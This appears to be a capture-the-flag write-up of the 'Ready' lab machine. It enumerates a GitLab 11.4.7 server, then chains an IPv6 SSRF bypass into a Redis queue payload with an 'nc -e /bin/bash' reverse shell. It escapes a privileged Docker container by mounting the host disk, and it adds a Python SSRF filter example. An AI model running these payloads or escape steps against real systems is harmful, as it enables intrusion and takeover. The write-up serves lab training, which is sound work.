IP-ADDR: ready.htb
nmap scan:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Port 5080 is running an nginx HTTP server.
It hosts a GitLab CE 11.4.7 instance; the version is shown in the help section after registering a new user.
Searching for a GitLab exploit on Exploit-DB:
❯ searchsploit gitlab 11.4.7
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authen | ruby/webapps/49257.py
---------------------------------------------- ---------------------------------
- Blog post on GitLab 11.4.7 Remote Code Execution from https://liveoverflow.com/
LiveOverflow explains it in his blog as well as in a YouTube video.
Verify SSRF:
Using an IPv6 address to bypass the filter on localhost.
And it worked.
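As an added example (not code from this writeup or from GitLab), the kind of string-match localhost filter that the IPv6 form above slips past, beside a check that parses the host as an address and rejects anything non-global; naive_filter_allows, hardened_filter_allows and the resolve hook are my own names.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def naive_filter_allows(url: str) -> bool:
    """Constructed stand-in for a string blocklist: only two spellings
    of loopback are denied, so any other form of the same host passes."""
    host = urlsplit(url).hostname or ""
    return host not in ("localhost", "127.0.0.1")


def _resolve(host: str) -> list:
    """Resolve a hostname to all of its addresses; fail closed on error."""
    try:
        return [info[4][0] for info in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []


def hardened_filter_allows(url: str, resolve=_resolve) -> bool:
    """Allow only http(s) URLs whose host is, or resolves only to,
    globally routable addresses. Literal IPv4, IPv6 and IPv4-mapped
    IPv6 hosts are parsed as addresses instead of compared as strings."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        resolved = resolve(host)  # hostname: check every resolved address
        if not resolved:
            return False
        addrs = [ipaddress.ip_address(a) for a in resolved]
    for addr in addrs:
        # Unwrap ::ffff:a.b.c.d so the IPv4 range rules apply to it too
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        # is_global is False for loopback, private, link-local and reserved ranges
        if not addr.is_global:
            return False
    return True
```

The resolved address must also be the one the HTTP client actually connects to, otherwise a DNS answer that changes between the check and the request still reaches an internal service.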
Got the payload from the bug reported by Jobert Abma in a HackerOne report:
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash 4141\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
URL-encoded using url-encode-decode.com.
❯ python payload-gen.py  # scripting left in for generating the payload, because for some reason GitLab returns a 422 error on every request made outside the Chromium browser.
Port: 4141
Intercept the "project import" request and replace the import URL with the payload.
- Inside a Docker container
[*] ctn000 Are we in a docker container?................................... yes!
... [snip] ...
-rwxr-xr-x 1 root root 0 Dec 1 12:41 /.dockerenv
The container's root password is lying around in the / (root) directory, but that password does not work.
Found a GitLab config file backup in the /opt/backup/ directory containing a password,
and that password works for the container root.
Now running the deepce.sh script: it found Privileged Mode enabled.
[+] Privileged Mode ......... Yes
Exploit Docker Privileged Mode with the deepce script:
./deepce.sh --no-enumeration --exploit PRIVILEGED -cmd 'hostname' -q
The --privileged (Privileged Mode) flag gives the container access to the host's devices, so the container's root user can mount the host's disk.
Privileged Mode allows container root to run fdisk against the host disks.
(remote) [email protected]:/tmp$ fdisk -l
... [snip] ...
Device Start End Sectors Size Type
/dev/sda1 2048 4095 2048 1M BIOS boot
/dev/sda2 4096 37746687 37742592 18G Linux filesystem
/dev/sda3 37746688 41940991 4194304 2G Linux swap
The host filesystem is on /dev/sda2.
Mounting the host filesystem inside the container:
mkdir /tmp/host
mount /dev/sda2 /tmp/host
wc -c /tmp/host/root/root.txt
Finally, a root shell on the host via the deepce script.